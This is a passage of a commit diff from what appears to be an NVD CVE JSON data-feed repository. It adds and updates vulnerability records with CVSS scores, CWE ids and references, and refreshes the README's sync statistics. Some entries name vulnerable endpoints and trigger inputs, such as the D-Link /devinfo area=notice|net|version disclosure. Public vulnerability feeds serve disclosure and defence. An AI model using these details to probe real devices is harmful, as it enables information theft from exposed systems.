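+"sourceIdentifier": "cna@vuldb.com",
+"published": "2024-01-19T15:15:09.240",
+"lastModified": "2024-01-19T15:56:19.500",
+"vulnStatus": "Awaiting Analysis",
+"descriptions": [
+{
+"lang": "en",
+"value": "A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
+}
+],
+"metrics": {
+"cvssMetricV31": [
+{
+"source": "cna@vuldb.com",
+"type": "Secondary",
+"cvssData": {
+"version": "3.1",
+"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
+"attackVector": "NETWORK",
+"attackComplexity": "HIGH",
+"privilegesRequired": "LOW",
+"userInteraction": "NONE",
+"scope": "UNCHANGED",
+"confidentialityImpact": "LOW",
+"integrityImpact": "NONE",
+"availabilityImpact": "NONE",
+"baseScore": 3.1,
+"baseSeverity": "LOW"
+},
+"exploitabilityScore": 1.6,
+"impactScore": 1.4
+}
+],
+"cvssMetricV2": [
+{
+"source": "cna@vuldb.com",
+"type": "Secondary",
+"cvssData": {
+"version": "2.0",
+"vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N",
+"accessVector": "NETWORK",
+"accessComplexity": "HIGH",
+"authentication": "SINGLE",
+"confidentialityImpact": "PARTIAL",
+"integrityImpact": "NONE",
+"availabilityImpact": "NONE",
+"baseScore": 2.1
+},
+"baseSeverity": "LOW",
+"exploitabilityScore": 3.9,
+"impactScore": 2.9,
+"acInsufInfo": false,
+"obtainAllPrivilege": false,
+"obtainUserPrivilege": false,
+"obtainOtherPrivilege": false,
+"userInteractionRequired": false
+}
+]
+},
+"weaknesses": [
+{
+"source": "cna@vuldb.com",
+"type": "Primary",
+"description": [
+{
+"lang": "en",
+"value": "CWE-200"
+}
+]
+}
+],
+"references": [
+{
+"url": "https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md",
+"source": "cna@vuldb.com"
+},
+{
+"url": "https://vuldb.com/?ctiid.251541",
+"source": "cna@vuldb.com"
+},
+{
+"url": "https://vuldb.com/?id.251541",
+"source": "cna@vuldb.com"
+}
+]
+}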


@ -0,0 +1,88 @@
{
"id": "CVE-2024-0717",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.190",
"lastModified": "2024-01-19T16:15:11.190",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-200"
}
]
}
],
"references": [
{
"url": "https://github.com/999zzzzz/D-Link",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251542",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251542",
"source": "cna@vuldb.com"
}
]
}


@ -0,0 +1,88 @@
{
"id": "CVE-2024-0718",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.507",
"lastModified": "2024-01-19T16:15:11.507",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 3.3
},
"baseSeverity": "LOW",
"exploitabilityScore": 6.4,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251543",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251543",
"source": "cna@vuldb.com"
}
]
}


@ -0,0 +1,88 @@
{
"id": "CVE-2024-0720",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.733",
"lastModified": "2024-01-19T16:15:11.733",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 4.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251544",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251544",
"source": "cna@vuldb.com"
}
]
}


@ -0,0 +1,88 @@
{
"id": "CVE-2024-0721",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T16:15:11.953",
"lastModified": "2024-01-19T16:15:11.953",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 4.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"references": [
{
"url": "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.251545",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.251545",
"source": "cna@vuldb.com"
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2024-21733",
"sourceIdentifier": "security@apache.org",
"published": "2024-01-19T11:15:08.043",
"lastModified": "2024-01-19T12:15:08.683",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",

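--- a/CVE-2024/CVE-2024-225xx/CVE-2024-22562.json
+++ b/CVE-2024/CVE-2024-225xx/CVE-2024-22562.json
@@ -0,0 +1,20 @@
+{
+"id": "CVE-2024-22562",
+"sourceIdentifier": "cve@mitre.org",
+"published": "2024-01-19T15:15:09.463",
+"lastModified": "2024-01-19T15:56:19.500",
+"vulnStatus": "Awaiting Analysis",
+"descriptions": [
+{
+"lang": "en",
+"value": "swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c."
+}
+],
+"metrics": {},
+"references": [
+{
+"url": "https://github.com/matthiaskramm/swftools/issues/210",
+"source": "cve@mitre.org"
+}
+]
+}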

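--- a/CVE-2024/CVE-2024-225xx/CVE-2024-22563.json
+++ b/CVE-2024/CVE-2024-225xx/CVE-2024-22563.json
@@ -0,0 +1,20 @@
+{
+"id": "CVE-2024-22563",
+"sourceIdentifier": "cve@mitre.org",
+"published": "2024-01-19T15:15:09.513",
+"lastModified": "2024-01-19T15:56:19.500",
+"vulnStatus": "Awaiting Analysis",
+"descriptions": [
+{
+"lang": "en",
+"value": "openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c."
+}
+],
+"metrics": {},
+"references": [
+{
+"url": "https://github.com/openvswitch/ovs-issues/issues/315",
+"source": "cve@mitre.org"
+}
+]
+}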


@ -2,8 +2,8 @@
"id": "CVE-2024-22876",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:13.510",
"lastModified": "2024-01-19T14:15:13.510",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -2,8 +2,8 @@
"id": "CVE-2024-22877",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T14:15:13.557",
"lastModified": "2024-01-19T14:15:13.557",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",


@ -0,0 +1,20 @@
{
"id": "CVE-2024-22920",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T15:15:09.560",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c."
}
],
"metrics": {},
"references": [
{
"url": "https://github.com/matthiaskramm/swftools/issues/211",
"source": "cve@mitre.org"
}
]
}


@ -2,12 +2,16 @@
"id": "CVE-2024-23387",
"sourceIdentifier": "vultures@jpcert.or.jp",
"published": "2024-01-19T04:15:09.987",
"lastModified": "2024-01-19T04:15:09.987",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product."
},
{
"lang": "es",
"value": "FusionPBX anterior a 5.1.0 contiene una vulnerabilidad de Cross-Site Scripting. Si esta vulnerabilidad es aprovechada por un atacante remoto autenticado con privilegios administrativos, se puede ejecutar un script arbitrario en el navegador web del usuario que inicia sesi\u00f3n en el producto."
}
],
"metrics": {},


@ -2,12 +2,16 @@
"id": "CVE-2024-23659",
"sourceIdentifier": "cve@mitre.org",
"published": "2024-01-19T05:15:09.233",
"lastModified": "2024-01-19T05:15:09.233",
"vulnStatus": "Received",
"lastModified": "2024-01-19T15:56:26.533",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
"value": "SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js."
},
{
"lang": "es",
"value": "SPIP anterior a 4.1.14 y 4.2.x anterior a 4.2.8 permite XSS mediante el nombre de un archivo cargado. Esto est\u00e1 relacionado con javascript/bigup.js y javascript/bigup.utils.js."
}
],
"metrics": {},


@ -9,13 +9,13 @@ Repository synchronizes with the NVD every 2 hours.
### Last Repository Update
```plain
2024-01-19T15:00:24.702129+00:00
2024-01-19T17:00:25.391679+00:00
```
### Most recent CVE Modification Timestamp synchronized with NVD
```plain
2024-01-19T14:54:30.993000+00:00
2024-01-19T16:35:49.683000+00:00
```
### Last Data Feed Release
@ -29,56 +29,57 @@ Download and Changelog: [Click](https://github.com/fkie-cad/nvd-json-data-feeds/
### Total Number of included CVEs
```plain
236371
236384
```
### CVEs added in the last Commit
Recently added CVEs: `12`
Recently added CVEs: `13`
* [CVE-2023-27168](CVE-2023/CVE-2023-271xx/CVE-2023-27168.json) (`2024-01-19T14:15:12.247`)
* [CVE-2023-43985](CVE-2023/CVE-2023-439xx/CVE-2023-43985.json) (`2024-01-19T14:15:12.317`)
* [CVE-2023-46351](CVE-2023/CVE-2023-463xx/CVE-2023-46351.json) (`2024-01-19T14:15:12.367`)
* [CVE-2023-50028](CVE-2023/CVE-2023-500xx/CVE-2023-50028.json) (`2024-01-19T14:15:12.413`)
* [CVE-2023-50030](CVE-2023/CVE-2023-500xx/CVE-2023-50030.json) (`2024-01-19T14:15:12.453`)
* [CVE-2023-51946](CVE-2023/CVE-2023-519xx/CVE-2023-51946.json) (`2024-01-19T14:15:12.500`)
* [CVE-2023-51947](CVE-2023/CVE-2023-519xx/CVE-2023-51947.json) (`2024-01-19T14:15:12.553`)
* [CVE-2023-51948](CVE-2023/CVE-2023-519xx/CVE-2023-51948.json) (`2024-01-19T14:15:12.663`)
* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T14:15:12.837`)
* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T14:15:13.277`)
* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T14:15:13.510`)
* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T14:15:13.557`)
* [CVE-2022-40700](CVE-2022/CVE-2022-407xx/CVE-2022-40700.json) (`2024-01-19T15:15:08.020`)
* [CVE-2022-45083](CVE-2022/CVE-2022-450xx/CVE-2022-45083.json) (`2024-01-19T15:15:08.247`)
* [CVE-2022-45845](CVE-2022/CVE-2022-458xx/CVE-2022-45845.json) (`2024-01-19T15:15:08.467`)
* [CVE-2022-47160](CVE-2022/CVE-2022-471xx/CVE-2022-47160.json) (`2024-01-19T15:15:08.777`)
* [CVE-2024-0714](CVE-2024/CVE-2024-07xx/CVE-2024-0714.json) (`2024-01-19T15:15:08.997`)
* [CVE-2024-0716](CVE-2024/CVE-2024-07xx/CVE-2024-0716.json) (`2024-01-19T15:15:09.240`)
* [CVE-2024-22562](CVE-2024/CVE-2024-225xx/CVE-2024-22562.json) (`2024-01-19T15:15:09.463`)
* [CVE-2024-22563](CVE-2024/CVE-2024-225xx/CVE-2024-22563.json) (`2024-01-19T15:15:09.513`)
* [CVE-2024-22920](CVE-2024/CVE-2024-229xx/CVE-2024-22920.json) (`2024-01-19T15:15:09.560`)
* [CVE-2024-0717](CVE-2024/CVE-2024-07xx/CVE-2024-0717.json) (`2024-01-19T16:15:11.190`)
* [CVE-2024-0718](CVE-2024/CVE-2024-07xx/CVE-2024-0718.json) (`2024-01-19T16:15:11.507`)
* [CVE-2024-0720](CVE-2024/CVE-2024-07xx/CVE-2024-0720.json) (`2024-01-19T16:15:11.733`)
* [CVE-2024-0721](CVE-2024/CVE-2024-07xx/CVE-2024-0721.json) (`2024-01-19T16:15:11.953`)
### CVEs modified in the last Commit
Recently modified CVEs: `46`
Recently modified CVEs: `69`
* [CVE-2024-0486](CVE-2024/CVE-2024-04xx/CVE-2024-0486.json) (`2024-01-19T14:21:56.513`)
* [CVE-2024-0485](CVE-2024/CVE-2024-04xx/CVE-2024-0485.json) (`2024-01-19T14:22:14.600`)
* [CVE-2024-0474](CVE-2024/CVE-2024-04xx/CVE-2024-0474.json) (`2024-01-19T14:23:04.517`)
* [CVE-2024-0484](CVE-2024/CVE-2024-04xx/CVE-2024-0484.json) (`2024-01-19T14:23:24.007`)
* [CVE-2024-20985](CVE-2024/CVE-2024-209xx/CVE-2024-20985.json) (`2024-01-19T14:24:29.627`)
* [CVE-2024-20983](CVE-2024/CVE-2024-209xx/CVE-2024-20983.json) (`2024-01-19T14:24:38.097`)
* [CVE-2024-20981](CVE-2024/CVE-2024-209xx/CVE-2024-20981.json) (`2024-01-19T14:24:48.497`)
* [CVE-2024-20977](CVE-2024/CVE-2024-209xx/CVE-2024-20977.json) (`2024-01-19T14:25:05.253`)
* [CVE-2024-20975](CVE-2024/CVE-2024-209xx/CVE-2024-20975.json) (`2024-01-19T14:25:11.520`)
* [CVE-2024-20973](CVE-2024/CVE-2024-209xx/CVE-2024-20973.json) (`2024-01-19T14:25:24.967`)
* [CVE-2024-20971](CVE-2024/CVE-2024-209xx/CVE-2024-20971.json) (`2024-01-19T14:25:31.020`)
* [CVE-2024-20969](CVE-2024/CVE-2024-209xx/CVE-2024-20969.json) (`2024-01-19T14:25:42.850`)
* [CVE-2024-20967](CVE-2024/CVE-2024-209xx/CVE-2024-20967.json) (`2024-01-19T14:25:50.880`)
* [CVE-2024-20965](CVE-2024/CVE-2024-209xx/CVE-2024-20965.json) (`2024-01-19T14:26:06.187`)
* [CVE-2024-20963](CVE-2024/CVE-2024-209xx/CVE-2024-20963.json) (`2024-01-19T14:26:13.473`)
* [CVE-2024-20961](CVE-2024/CVE-2024-209xx/CVE-2024-20961.json) (`2024-01-19T14:26:21.527`)
* [CVE-2024-0233](CVE-2024/CVE-2024-02xx/CVE-2024-0233.json) (`2024-01-19T14:28:14.077`)
* [CVE-2024-0235](CVE-2024/CVE-2024-02xx/CVE-2024-0235.json) (`2024-01-19T14:28:22.047`)
* [CVE-2024-0236](CVE-2024/CVE-2024-02xx/CVE-2024-0236.json) (`2024-01-19T14:28:41.540`)
* [CVE-2024-0237](CVE-2024/CVE-2024-02xx/CVE-2024-0237.json) (`2024-01-19T14:29:02.700`)
* [CVE-2024-0238](CVE-2024/CVE-2024-02xx/CVE-2024-0238.json) (`2024-01-19T14:29:13.280`)
* [CVE-2024-22628](CVE-2024/CVE-2024-226xx/CVE-2024-22628.json) (`2024-01-19T14:33:00.143`)
* [CVE-2024-22627](CVE-2024/CVE-2024-226xx/CVE-2024-22627.json) (`2024-01-19T14:38:53.237`)
* [CVE-2024-22626](CVE-2024/CVE-2024-226xx/CVE-2024-22626.json) (`2024-01-19T14:40:09.903`)
* [CVE-2024-22625](CVE-2024/CVE-2024-226xx/CVE-2024-22625.json) (`2024-01-19T14:40:27.910`)
* [CVE-2023-40692](CVE-2023/CVE-2023-406xx/CVE-2023-40692.json) (`2024-01-19T16:15:09.330`)
* [CVE-2023-46219](CVE-2023/CVE-2023-462xx/CVE-2023-46219.json) (`2024-01-19T16:15:09.430`)
* [CVE-2023-47701](CVE-2023/CVE-2023-477xx/CVE-2023-47701.json) (`2024-01-19T16:15:09.547`)
* [CVE-2023-49285](CVE-2023/CVE-2023-492xx/CVE-2023-49285.json) (`2024-01-19T16:15:09.653`)
* [CVE-2023-49286](CVE-2023/CVE-2023-492xx/CVE-2023-49286.json) (`2024-01-19T16:15:09.793`)
* [CVE-2023-49288](CVE-2023/CVE-2023-492xx/CVE-2023-49288.json) (`2024-01-19T16:15:09.930`)
* [CVE-2023-50269](CVE-2023/CVE-2023-502xx/CVE-2023-50269.json) (`2024-01-19T16:15:10.063`)
* [CVE-2023-50495](CVE-2023/CVE-2023-504xx/CVE-2023-50495.json) (`2024-01-19T16:15:10.193`)
* [CVE-2023-5528](CVE-2023/CVE-2023-55xx/CVE-2023-5528.json) (`2024-01-19T16:15:10.280`)
* [CVE-2023-5868](CVE-2023/CVE-2023-58xx/CVE-2023-5868.json) (`2024-01-19T16:15:10.410`)
* [CVE-2023-5869](CVE-2023/CVE-2023-58xx/CVE-2023-5869.json) (`2024-01-19T16:15:10.620`)
* [CVE-2023-5870](CVE-2023/CVE-2023-58xx/CVE-2023-5870.json) (`2024-01-19T16:15:10.867`)
* [CVE-2023-6277](CVE-2023/CVE-2023-62xx/CVE-2023-6277.json) (`2024-01-19T16:15:11.057`)
* [CVE-2023-42136](CVE-2023/CVE-2023-421xx/CVE-2023-42136.json) (`2024-01-19T16:19:25.047`)
* [CVE-2023-42137](CVE-2023/CVE-2023-421xx/CVE-2023-42137.json) (`2024-01-19T16:21:06.650`)
* [CVE-2023-4818](CVE-2023/CVE-2023-48xx/CVE-2023-4818.json) (`2024-01-19T16:35:49.683`)
* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T15:56:19.500`)
* [CVE-2024-23387](CVE-2024/CVE-2024-233xx/CVE-2024-23387.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-23659](CVE-2024/CVE-2024-236xx/CVE-2024-23659.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-0705](CVE-2024/CVE-2024-07xx/CVE-2024-0705.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-21733](CVE-2024/CVE-2024-217xx/CVE-2024-21733.json) (`2024-01-19T15:56:26.533`)
* [CVE-2024-0318](CVE-2024/CVE-2024-03xx/CVE-2024-0318.json) (`2024-01-19T16:13:08.503`)
## Download and Usage